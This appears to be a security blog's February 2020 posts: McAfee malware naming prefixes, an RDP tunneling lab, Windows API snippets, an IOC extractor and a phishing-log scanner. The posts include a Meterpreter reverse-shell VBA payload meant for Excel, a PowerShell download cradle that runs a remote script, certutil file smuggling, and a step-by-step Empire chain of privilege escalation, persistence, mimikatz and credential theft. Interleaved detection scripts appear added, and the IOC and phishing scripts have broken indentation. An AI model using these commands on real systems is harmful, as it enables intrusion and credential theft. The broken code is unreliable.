Monday, February 24, 2020

McAfee Antivirus Malware Virus Type Names Prefixes

Taken from the McAfee DAT readme linked below (2017 version):

http://download.nai.com/products/datfiles/4.x/nai/readme.txt

   A97M/    Macro virus that infects Microsoft
            Access 97 files.

   APM/     Macro virus or Trojan horse program
            that infects Ami Pro document and
            template files.

   Bat/     Batch-file virus or Trojan horse
            program. These viruses usually run
            as batch or script files that
            affect a particular program that
            interprets the script or batch
            commands they include. They are
            very portable and can affect nearly
            any platform that can run batch or
            script files. The files themselves
            often have a .bat extension.

   CSC/     Corel Script virus or Trojan horse
            program that infects Corel Draw
            document files, template files, and
            scripts.

   IRC/     Internet Relay Chat script virus.
            This virus type can use early
            versions of the mIRC client
            software to distribute a virus or
            payload.

   JS/      Script virus or Trojan horse
            program written in JavaScript
            language.

   JV/      Potentially harmful Java
            application or applet.

   Linux/   Virus or Trojan horse program
            compiled for Linux operating system 
            in ELF file format.

   LWP/     Potentially harmful software for
            Lotus WordPro.

   MacHC/   Virus or Trojan horse program for
            Apple Macintosh HyperCard scripting
            language.

   MacOS/   Virus or Trojan horse program for
            Apple Macintosh OS versions 6-9.

   MSIL/    Application written using Microsoft
            Intermediate Language framework,
            also known as .NET.

   P98M/    Macro virus or Trojan horse program
            that infects Microsoft Project
            documents and templates.

   PalmOS/  Virus or Trojan horse program for a
            Palm Pilot.

   PDF/     File-infector of Adobe PDF files.

   Perl/    Script virus or Trojan horse
            program written in Perl language.

   PHP/     Script virus or Trojan horse
            program written in PHP language.

   PP97M/   Macro virus. Infects Microsoft
            PowerPoint 97 files.

   RDN/     Denotes that the malware signature
            was authored by the McAfee automation
            system.

   SunOS/   Potentially harmful software for
            Sun Solaris.

   SWF/     Potentially harmful software for
            Shockwave.

   Unix/    Program or a shell script for a
            version of UNIX.

   V5M/     Macro or script virus, or
            Trojan horse program that infects
            Visio VBA (Visual Basic for
            Applications) macros or scripts.

   VBS/     Script virus or Trojan horse
            program written in Visual Basic
            Script language.

   W16/     File-infector virus that runs in
            16-bit Microsoft Windows
            environments (Windows 3.1x).

   W2K/     Potentially harmful software for
            32-bit Microsoft Windows
            environments, specifically Windows
            NT, 2000, or XP.

   W32/     File-infector or boot-sector virus
            that runs in 32-bit Microsoft
            Windows environments (Windows 95,
            Windows 98, or Windows NT).

   W95/     File-infector virus that runs in
            Microsoft Windows 95, Windows 98,
            and Windows ME environments.

   W97M/    Macro virus that infects Microsoft
            Word 97 files.

   WHLP/    Potentially harmful software for
            32-bit Microsoft Windows
            environments that target Windows
            HLP files.

   WM/      Macro virus that infects Microsoft
            Word 95 files.

   X97M/    Macro virus that infects Microsoft
            Excel 97 files.

   XF/      Macro virus that infects Microsoft
            Excel 95 or 97 via Excel formulas.

   XM/      Macro virus that infects Microsoft
            Excel 95 files.


   AdClicker    - Repeatedly accesses websites that
                  are funded by advertising.

   Adware       - Installs advertising software but
                  does not ask permission.

   BackDoor     - Provides remote access or control
                  through the Internet or network.

   Dialer       - Dials a phone number without
                  asking for permission.

   DDoS         - Operates as a Distributed Denial of
                  Service component.

   Del          - Deletes files.

   Downloader   - Downloads software from the
                  Internet, usually to deliver
                  backdoors, password stealers, and
                  sometimes viruses.

   Exploit      - Uses a vulnerability or a software
                  defect.

   FDoS         - Denotes a Flooding Denial of
                  Service component.

   KeyLog       - Logs keystrokes for immediate or
                  future transmission to the
                  attacker.

   Kit          - Denotes a program designed for
                  creating a virus or Trojan horse
                  program.

   MultiDropper - Drops several Trojan horse programs
                  or viruses (often several different
                  ‘backdoors’).

   Nuke         - Uses defects in software installed
                  on a remote computer to bring it down.

   ProcKill     - Terminates the processes of
                  anti-virus and security products.
                  May also delete files associated
                  with such applications.

   PWS          - Steals a password.

   Reboot       - Reboots the computer.

   Reg          - Modifies the Registry in an
                  undesirable fashion without asking
                  questions. For example, reduces the
                  security settings or creates
                  abnormal associations or sets.

   Spam         - Acts as a spamming tool.

   Spyware      - Monitors browsing habits or other
                  behavior and sends the information
                  out, often for unsolicited
                  advertising.

   Uploader     - Sends files or other data from the
                  computer.

   Vtool        - Denotes a program used by virus
                  writers or hackers for developing
                  software.

   Zap          - Wipes all or part of a hard disk.


Thursday, February 20, 2020

FireEye RDP Tunneling walk-through

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

Set up two VMs in Oracle VirtualBox, both attached to an "internal network":
- one VM is Windows 10
- one VM is Kali Linux
Make sure they can ping each other.

Setup in the Windows 10 VM
- download plink.exe from the PuTTY website

Setup in the Kali Linux VM
- edit /etc/ssh/sshd_config to allow root SSH logins (PermitRootLogin yes)
- start or restart the SSH server (systemctl start ssh.service, systemctl restart ssh.service)
- check the status of SSH to make sure it is running (systemctl status ssh)

Steps to perform RDP tunneling
1.) on the Windows victim box
     plink.exe root@kaliLinuxIPAddress -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

   (note: this sets up an SSH tunnel from the Windows victim box to the Linux attacker box. kaliLinuxIPAddress is replaced with the IP of the attacker box, and root with whatever account you want to SSH with. You should see an SSH connection going from the Windows box to the attacker box on port 22.)

2.) then on the kali linux box
     rdesktop -u VictimAccount  127.0.0.1:12345

     or

     xfreerdp /u:VictimAccount 127.0.0.1:12345

     or
 
     use Remmina for RDP and connect to 127.0.0.1:12345 (this is what worked best for me on Windows 10; the others did not appear to support the proper network authentication encryption)

     (note: you should now be presented with a remote desktop session to the victim box from the attacker box. The interesting thing is that you won't see any RDP traffic on the wire, only the already established SSH connection/tunnel on port 22. Also, on the victim box you won't see any traffic from the attacker box in the logs; everything, such as the remote desktop logs, shows a source IP of 127.0.0.1.)
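That last note is the detection angle worth keeping: the tunnel hides the attacker's address behind 127.0.0.1. Below is an added example (not part of the original post or the FireEye write-up) that hunts for both sides of the technique over constructed event records: an SSH client launched with a remote forward to port 3389, and an RDP logon whose source is loopback. The event dictionaries are stand-ins I made up for Sysmon process-creation and Security 4624 fields.

```python
import re

# Constructed sample events standing in for Sysmon process-creation and Security 4624
# logon records (not real logs). Event 1 is the plink command from the walk-through.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Users\win10\Downloads\plink.exe",
     "cmdline": "plink.exe root@10.0.0.5 -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389"},
    {"type": "process", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N -R 8080:localhost:80 user@10.0.0.9"},
    {"type": "logon", "event_id": 4624, "logon_type": 10, "source_ip": "127.0.0.1", "user": "win10"},
    {"type": "logon", "event_id": 4624, "logon_type": 10, "source_ip": "10.0.0.7", "user": "win10"},
    {"type": "logon", "event_id": 4624, "logon_type": 3, "source_ip": "127.0.0.1", "user": "SYSTEM"},
]

SSH_CLIENTS = ("plink.exe", "ssh.exe", "putty.exe")
# -R [bind_address:]port:host:hostport, the remote-forward syntax plink and OpenSSH share
REMOTE_FORWARD = re.compile(r"-R\s+(?:\S+:)?(\d+):(\S+?):(\d+)")
LOOPBACK = ("127.0.0.1", "::1", "localhost")
RDP_PORT = 3389

def check_process(ev):
    """Flag an SSH client whose -R forward publishes the local RDP port on the remote end."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    if image not in SSH_CLIENTS:
        return None
    m = REMOTE_FORWARD.search(ev["cmdline"])
    if not m or int(m.group(3)) != RDP_PORT:
        return None
    return "%s forwards %s:%s to remote port %s (RDP over SSH tunnel)" % (
        image, m.group(2), m.group(3), m.group(1))

def check_logon(ev):
    """Flag an RDP logon (4624, logon type 10 = RemoteInteractive) sourced from loopback:
    a genuine remote desktop session carries the client's address, a tunneled one does not."""
    if ev.get("event_id") == 4624 and ev.get("logon_type") == 10 and ev.get("source_ip") in LOOPBACK:
        return "RDP logon for %s from loopback source %s (possible tunneled RDP)" % (
            ev["user"], ev["source_ip"])
    return None

def hunt(events):
    """Run the right check on each event and collect the alert strings."""
    alerts = []
    for ev in events:
        msg = check_process(ev) if ev["type"] == "process" else check_logon(ev)
        if msg:
            alerts.append(msg)
    return alerts

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert)
```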

Saturday, February 15, 2020

python pefile ctypes kernel32.dll examples

import pefile
import ctypes
kfile = pefile.PE(r'Kernel32.dll')        # parse the DLL on disk with pefile (headers, exports, ...)
k32 = ctypes.WinDLL('kernel32')          # load kernel32 so its exported functions can be called via ctypes


--- *** displays all exported function names *** ---
for export in kfile.DIRECTORY_ENTRY_EXPORT.symbols:
 print(export.name)


--- *** executes a command like whoami *** ---
k32.WinExec(b'whoami', 1)    # WinExec(lpCmdLine, uCmdShow); 1 = SW_SHOWNORMAL


--- *** creates a new folder *** ---
k32.CreateDirectoryW(r'c:\users\win10\testfolder', None)


--- *** prints length of a string *** ---
k32.lstrlenA(b'something')

--- *** start and stop a timer *** ---
start = k32.GetTickCount()          # milliseconds since boot (32-bit value, wraps after ~49.7 days)
end = k32.GetTickCount()
elapsedTime = (end - start) / 1000  # seconds

--- *** get process id for the python.exe program running this code *** ---
k32.GetCurrentProcessId()

--- *** get current working directory *** ---
s = ctypes.create_string_buffer(260)     # MAX_PATH bytes; 50 is too small for many real paths
k32.GetCurrentDirectoryA(len(s), s)      # (nBufferLength, lpBuffer); returns 0 on failure
string = s.value.decode()                # .value stops at the first NUL, so no manual byte loop is needed

--- *** get environment variable APPDATA value *** ---
s = ctypes.create_string_buffer(260)
k32.GetEnvironmentVariableA(b'APPDATA', s, len(s))   # (lpName, lpBuffer, nSize); returns 0 if the variable is unset
string = s.value.decode()

Friday, February 14, 2020

Generate Meterpreter Metasploit VBA

msfconsole
use payload/windows/meterpreter/reverse_tcp
show options
setg LHOST 10.10.10.10
setg LPORT 3000
generate -t vba -f meterpreter.vba

copy & paste into excel

Powershell download cradle

Sample download cradle, used in conjunction with python -m SimpleHTTPServer 80

powershell -command "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)"
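To make this cradle useful from the defensive side as well, here is an added example (not from the original post) that flags the pattern in PowerShell script-block or command-line text: a remote fetch via Net.WebClient combined with in-memory execution via IEX. The sample strings are constructed; the first three are variants of the cradle above, the last two are benign.

```python
import re

# Constructed samples (not real logs) of PowerShell script-block / command-line text.
# The first three are variants of the cradle above; the last two are benign.
SAMPLES = [
    "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)",
    "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/a.ps1')",
    "iex ((New-Object Net.WebClient).DownloadString('http://10.10.10.10/a.ps1'))",
    "(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/tools.zip', 'C:\\temp\\tools.zip')",
    "Get-ChildItem C:\\Windows\\System32 | Sort-Object Length -Descending | Select-Object -First 5",
]

# (rule name, pattern); PowerShell is case-insensitive, so every rule is too
RULES = [
    ("webclient_download", re.compile(r"\bNet\.WebClient\b.*?\bDownload(?:String|Data|File)\b", re.I | re.S)),
    ("invoke_expression", re.compile(r"(?<![\w-])(?:iex|Invoke-Expression)\b", re.I)),
    ("remote_url", re.compile(r"https?://\S+", re.I)),
]

def score_cradle(text):
    """Names of the rules that fire on one script block or command line."""
    return [name for name, pat in RULES if pat.search(text)]

def is_download_cradle(text):
    """A download cradle is remote content fetched AND executed in memory, so both the
    fetch rule (WebClient download) and the execute rule (IEX) must fire. A plain
    DownloadFile without IEX is noted by score_cradle() but not called a cradle."""
    hits = score_cradle(text)
    return "webclient_download" in hits and "invoke_expression" in hits

def triage(samples):
    """(text, verdict, rules fired) for each sample, for an analyst to review."""
    return [(text, is_download_cradle(text), score_cradle(text)) for text in samples]

if __name__ == "__main__":
    for text, verdict, hits in triage(SAMPLES):
        print("CRADLE " if verdict else "benign ", hits, text[:60])
```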

Powershell Empire common path

Powershell Empire common path in a lab test environment

./empire

1.) set up a listener
listeners
uselistener http
execute

2.) create a stager
usestager multi/launcher
set Listener http
set OutFile /launcher.ps1

3.) set up a web server to serve the malicious launcher
python -m SimpleHTTPServer 8000

4.) infect victim
have the victim PC reach out to the attacker PC, download launcher.ps1 and execute it

5.) interact with agent
** you should see the agent check in as soon as step #4 above is complete
interact XXXXX
rename victim

6.) see where you are
sysinfo
whoami
pwd
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

7.) if not admin, find weaknesses
usemodule privesc/powerup/allchecks
execute

8.) if not admin, use a weakness to escalate to admin (perhaps you are already admin and just need a UAC bypass)
usemodule privesc/bypassuac_env
set Listener http
execute

9.) interact with admin agent
** if it works, you should get a new agent check-in immediately after step #8 that is admin **
interact XXXX
rename victimAsAdmin

10.) see where you are
whoami
info    (if HighIntegrity = 0 then regular user, if = 1 then admin)

11.) if admin, move to SYSTEM
usemodule privesc/getsystem
execute

12.) see where you are
whoami    (should say SYSTEM now)

13.) setup persistence as a scheduled task
usemodule persistence/userland/schtasks
set Listener http
set IdleTime 2
execute

14.) run mimikatz
mimikatz

15.) enumerate credential store
usemodule credentials/enum_cred_store
execute

16.) enable remote desktop
usemodule management/enable_rdp
execute

17.) remote desktop into the victim with credentials found

Thursday, February 13, 2020

Powershell split and sort

In PowerShell, if you have an ugly string like the environment PATH


PS c:\> $env:PATH

C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\PuTTY\;C:\Program Files\Microsoft VS Code\bin


you can quickly split it up and make it readable like this

PS c:\> $env:PATH -Split ";" | Sort-Object -Unique

C:\Program Files (x86)\IBM\Client Access\
C:\Program Files\Microsoft VS Code\bin
C:\Program Files\PuTTY\
C:\WINDOWS
C:\WINDOWS\system32
C:\WINDOWS\System32\OpenSSH\
C:\WINDOWS\System32\Wbem
C:\WINDOWS\System32\WindowsPowerShell\v1.0\

Tuesday, February 11, 2020

Using certutil.exe to transfer files

1.) create a file to encode/transfer

> Add-Content test.txt "a test"

2.) pack it up as a certificate before transfer

> $raw = get-content -path test.txt -Encoding Byte
> $b64 = [System.Convert]::ToBase64String($raw)
> $begin = "-----BEGIN CERTIFICATE-----"
> $end = "-----END CERTIFICATE-----"
> "$begin$b64$end"|Out-File output.txt

3.) transfer it however you like

4.) receiving end decodes it back to original state with certutil

> certutil.exe -decode output.txt decoded.txt
> get-content decoded.txt
      a test



---
explanation
- create a file you want to encode/transfer
- read it as raw bytes
- base64 encode it
- wrap it in the BEGIN/END CERTIFICATE banners so it looks like a legitimate certificate file
- now you can transfer it
- on the receiving end, use certutil.exe to decode it back to its original state
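The weak point of this trick, from a defender's view, is that the "certificate" is not one: the base64 body does not decode to DER. The following added example (not from the original post) rebuilds step 2 in Python to construct a sample, then classifies files by whether the PEM body starts with a well-formed X.509 SEQUENCE. The DER check is a structural heuristic written for this page, not a full certificate parser.

```python
import base64
import binascii
import re

PEM_RE = re.compile(r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)

def wrap_as_fake_cert(data):
    """Same transform as step 2 above: base64 the bytes and add the PEM banners."""
    return "-----BEGIN CERTIFICATE-----" + base64.b64encode(data).decode("ascii") + "-----END CERTIFICATE-----"

def pem_body(text):
    """Decoded bytes of the first CERTIFICATE block, or None if there is no valid block."""
    m = PEM_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
    except binascii.Error:
        return None

def looks_like_der_certificate(der):
    """Structural check only: an X.509 certificate is a DER SEQUENCE (tag 0x30) whose
    length covers exactly the rest of the buffer and whose first element (tbsCertificate)
    is itself a SEQUENCE. Smuggled text fails at the very first byte."""
    if len(der) < 4 or der[0] != 0x30:
        return False
    if der[1] < 0x80:                       # short-form length
        length, hdr = der[1], 2
    else:                                   # long form: 0x8N followed by N length bytes
        n = der[1] & 0x7F
        if n == 0 or n > 4 or len(der) < 2 + n:
            return False
        length, hdr = int.from_bytes(der[2:2 + n], "big"), 2 + n
    return hdr + length == len(der) and length >= 2 and der[hdr] == 0x30

def classify(text):
    """'not-pem', 'fake-cert' (PEM banners around non-certificate data) or 'cert'."""
    der = pem_body(text)
    if der is None:
        return "not-pem"
    return "cert" if looks_like_der_certificate(der) else "fake-cert"

# Constructed samples: the walk-through's test.txt wrapped as in step 2, and a minimal
# hand-built SEQUENCE{SEQUENCE{}} standing in for the header of a real certificate.
FAKE_CERT = wrap_as_fake_cert(b"a test\r\n")
MINIMAL_DER = bytes([0x30, 0x02, 0x30, 0x00])
REAL_SHAPED = "-----BEGIN CERTIFICATE-----\n%s\n-----END CERTIFICATE-----\n" % base64.b64encode(MINIMAL_DER).decode("ascii")

if __name__ == "__main__":
    for label, sample in (("fake", FAKE_CERT), ("real-shaped", REAL_SHAPED)):
        print(label, "->", classify(sample))
```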

Friday, February 7, 2020

python test ioc extractor

# Steps
# 1.) Drop IoCs [IP addresses or URLs only, currently] from the sources below into "iocs.txt"
# - Emotet ( https://twitter.com/Cryptolaemus1 )
# - UrlHaus ( https://urlhaus.abuse.ch/downloads/csv_online/ )
# - Phish Tank ( https://www.phishtank.com/phish_search.php?page=1&active=y&valid=y&Search=Search )
# - Trickbot ( https://twitter.com/search?q=%23trickbot&src=typed_query&f=live )
# 2.) run script
import sys
import os
import re
from urllib.parse import urlparse
debug = 0
filepath = 'iocs.txt'
ipfilepath = 'ips.txt'
dnsfilepath = 'dns.txt'
ioccontainswhitelist = [
".sendgrid.net"
]
iocwhitelist = [
"google.com",
"www.google.com",
"urlhaus.abuse.ch",
"pastebin.com",
"ak.imgfarm.com",
"docs.google.com",
"drive.google.com",
"i.imgur.com",
"img.sobot.com",
"imgur.com",
"www.imgur.com",
"raw.githubusercontent.com",
"github.com",
"www.github.com",
"adobe.com",
"www.adobe.com",
"ibm.com",
"www.ibm.com",
"dell.com",
"www.dell.com",
"bing.com",
"www.bing.com",
"msn.com",
"www.msn.com",
"documentcloud.adobe.com",
"cisco.com",
"www.cisco.com",
"oshkosh.webex.com",
"l.yimg.com",
"yimg.com",
"dl.dropboxusercontent.com",
"dropbox.com",
"www.dropbox.com",
"godaddy.com",
"godaddysites.com",
"files.constantcontact.com",
"ipinfo.io",
"bit.ly",
"onedrive.live.com",
"000webhostapp.com",
"storage.googleapis.com",
"wikileaks.org",
"forms.gle",
"go2l.ink",
"capesandbox.com",
"twitter.com",
"paste.cryptolaemus.com",
"cryptolaemus.com",
"gist.githubusercontent.com",
"bitbucket.org",
"img1.wsimg.com",
"cdn.discordapp.com",
"web.mit.edu",
"bit.do",
"na3.docusign.net",
"sway.office.com",
"sites.google.com",
"aka.ms",
"login.microsoftonline.com",
"track.smtpsendmail.com",
"r20.rs6.net",
"files.gamebanana.com",
"sems.sas.com"
]
with open(filepath) as fp:
 rawLine = fp.readline().rstrip()
 ipResults = []
 dnsResults = []
  while rawLine:
   rawLine = rawLine.rstrip()   # drop the trailing newline so a bare-domain match is not written out with it
   if debug:
    print("DEBUG: reviewing %s" % rawLine)
  found = 0
  ioc = None
  isIp = 0
  isDns = 0
  ipRegex = re.findall( r'(\d+\.\d+\.\d+\.\d+)', rawLine )
  if ipRegex:
   ioc = ipRegex[0]
   isIp = 1
   if debug:
    print("DEBUG: IP address %s" % ioc)
  if not ioc:
   urlRegex = re.search(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\), ]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', rawLine)   # raw string: avoids invalid-escape warnings
   if urlRegex:
    parts = urlRegex.group().split('/')
    if parts and len(parts) > 2:
     ioc = urlRegex[0].split('/')[2]
     isDns = 1
     if debug:
      print("DEBUG: url with http %s" % ioc)
   if not ioc:
    if debug:
     print("DEBUG: checking url 2nd time")
     urlRegexV2 = re.search(r'^([a-zA-Z.]+\.([a-zA-Z]){2,7}\/.*)$', rawLine)
    if urlRegexV2:
     parts = urlRegexV2.group().split('/')
     if parts and len(parts) > 0:
      ioc = parts[0]
      isDns = 1
      if debug:
       print("DEBUG: url without http %s" % ioc)
    else:
     if debug:
      print("DEBUG: checking url 3rd time")
      urlTest = re.search(r'^([a-zA-Z.]+)\.([a-zA-Z]){2,7}$', rawLine)
     if urlTest:
      ioc = rawLine
      isDns = 1
      if debug:
       print("DEBUG: url domain only %s" % ioc)
  if ioc:
   ioc = ioc.lower()
   for ignoredIoc in iocwhitelist:
    if ioc == ignoredIoc.lower():
     found = 1
     if debug:
      print("DEBUG: ignored %s" % ioc)
     break
   for ignoredIoc in ioccontainswhitelist:
    if ignoredIoc.lower() in ioc:
     found = 1
     if debug:
      print("DEBUG: ignored %s" % ioc)
     break
   if found == 0:
    if "..." not in ioc:
     if isIp:
      ipResults.append(ioc)
     if isDns:
      dnsResults.append(ioc)
  rawLine = fp.readline()

ipResults = sorted(set(ipResults))
dnsResults = sorted(set(dnsResults))

with open(ipfilepath,"w+") as fp:
 for ioc in ipResults:
  fp.write("%s\n" % ioc)
 if len(ipResults) > 0:
  print("%s created" % ipfilepath)

with open(dnsfilepath,"w+") as fp:
 for ioc in dnsResults:
  fp.write("%s\n" % ioc)
 if len(dnsResults) > 0:
  print("%s created" % dnsfilepath)
 

Monday, February 3, 2020

phishing log hunting

import requests
import os
filepath = 'urls.txt'
folders = ["", "log", "logs", "script", "scripts"]
files = ["logs.txt", "log.txt", "log.html", "logs.html", "error_logs.txt", "error_log.txt", "script.txt", "1.php", "ise.txt", "user.txt", "users.txt", "stored.txt", "fullz.txt", "accounts.txt", "login.txt", "logins.txt", "U1.txt"]
printfailures = 0
foundcount = 0
quietmode = 1
printstatus = 1
searchcount = 0
with open(filepath) as fp:
 theurl = fp.readline()
 while theurl:
  searchcount = searchcount + 1
  theurl = theurl.strip()
  lastparen = theurl.rfind("/")
  baseurl = ""
  if lastparen > 10:
   baseurl = theurl[:lastparen]
  else:
   baseurl = theurl
  if printstatus == 1:
   if searchcount % 10 == 0:
    print("----------")
    print("STATUS   : %s done" % searchcount)
    print("----------")
  if quietmode == 0:
   print("----------")
   print("TESTING  : %s" % baseurl)
   print("----------")
  timeout = 0
  foundcount = 0
  for folder in folders:
   if timeout == 1:
    break
   if foundcount > 2:
    break
   for file in files:
    if timeout == 1:
     if quietmode == 0:
      print("**TIMEOUT DETECTED, CANCELLING")
     break
    if foundcount > 2:
     print("**HIGH HIT RATE DETECTED, STOPPING SEARCH, LIKELY FALSE POSITIVE")
     break
    stem = ("/%s/%s" % (folder, file))
    stem = stem.replace("//", "/")
    url = ("%s%s" % (baseurl, stem))
    try:
     response = requests.get(url, timeout=2)
     if response.status_code == 200:
      foundcount = foundcount + 1
      if quietmode == 1:
       if foundcount == 1:
        print("----------")
        print("URL      : %s" % baseurl)
        print("----------")
      print("=>FOUND<=: %s (RESPONSE: %s)" % ( stem , str(response.status_code) ))
     else:
      if printfailures == 1:
       if quietmode == 0:
        print("**FAIL   : %s (RESPONSE: %s)" % ( stem , str(response.status_code) ))
     except requests.exceptions.RequestException:   # timeouts, connection errors, malformed URLs; not KeyboardInterrupt
     timeout = 1
     if printfailures == 1:
      if quietmode == 0:
       print("**FAIL   : %s (TIMEOUT)" % theurl)
  if foundcount == 0:
   if quietmode == 0:
    print("**0 HITS")
  theurl = fp.readline()